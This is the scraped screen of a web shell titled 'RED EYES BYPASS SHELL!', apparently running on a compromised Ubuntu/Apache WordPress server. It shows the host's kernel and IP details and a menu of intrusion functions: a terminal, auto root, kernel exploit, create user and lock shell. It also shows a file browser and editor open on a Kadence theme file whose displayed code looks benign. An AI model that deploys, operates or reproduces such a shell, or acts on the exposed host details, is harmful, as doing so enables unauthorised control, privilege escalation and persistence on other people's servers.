Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
bigdata /
wp-content /
themes /
kadence /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
assets
[ DIR ]
drwxr-xr-x
bbpress
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
lifterlms
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
tribe
[ DIR ]
drwxr-xr-x
tribe-events
[ DIR ]
drwxr-xr-x
tutor
[ DIR ]
drwxr-xr-x
404.php
403
B
-rwxr-xr-x
500.php
887
B
-rwxr-xr-x
LICENSE
34.33
KB
-rwxr-xr-x
accessibility.txt
2.1
KB
-rwxr-xr-x
changelog.txt
50.31
KB
-rwxr-xr-x
comments.php
1010
B
-rwxr-xr-x
footer.php
725
B
-rwxr-xr-x
functions.php
955
B
-rwxr-xr-x
header.php
1.24
KB
-rwxr-xr-x
index.php
284
B
-rwxr-xr-x
offline.php
948
B
-rwxr-xr-x
page.php
322
B
-rwxr-xr-x
readme.txt
54.44
KB
-rwxr-xr-x
screenshot.png
278.59
KB
-rwxr-xr-x
sidebar.php
841
B
-rwxr-xr-x
single.php
322
B
-rwxr-xr-x
style.css
1.32
KB
-rwxr-xr-x
theme.json
3.2
KB
-rwxr-xr-x
wpml-config.xml
2.76
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : offline.php
<?php /** * The template for displaying offline pages * * @link https://github.com/xwp/pwa-wp#offline--500-error-handling * * @package kadence */ namespace Kadence; if ( ! defined( 'ABSPATH' ) ) { exit; } // Prevent showing nav menus. add_filter( 'has_nav_menu', '__return_false' ); get_header(); kadence()->print_styles( 'kadence-content' ); /** * Hook for Hero Section */ do_action( 'kadence_hero_header' ); ?> <div id="primary" class="content-area"> <div class="content-container site-container"> <div id="main" class="site-main"> <?php /** * Hook for anything before main content */ do_action( 'kadence_before_main_content' ); get_template_part( 'template-parts/content/error', 'offline' ); /** * Hook for anything after main content. */ do_action( 'kadence_after_main_content' ); ?> </div><!-- #main --> <?php get_sidebar(); ?> </div> </div><!-- #primary --> <?php get_footer();
Close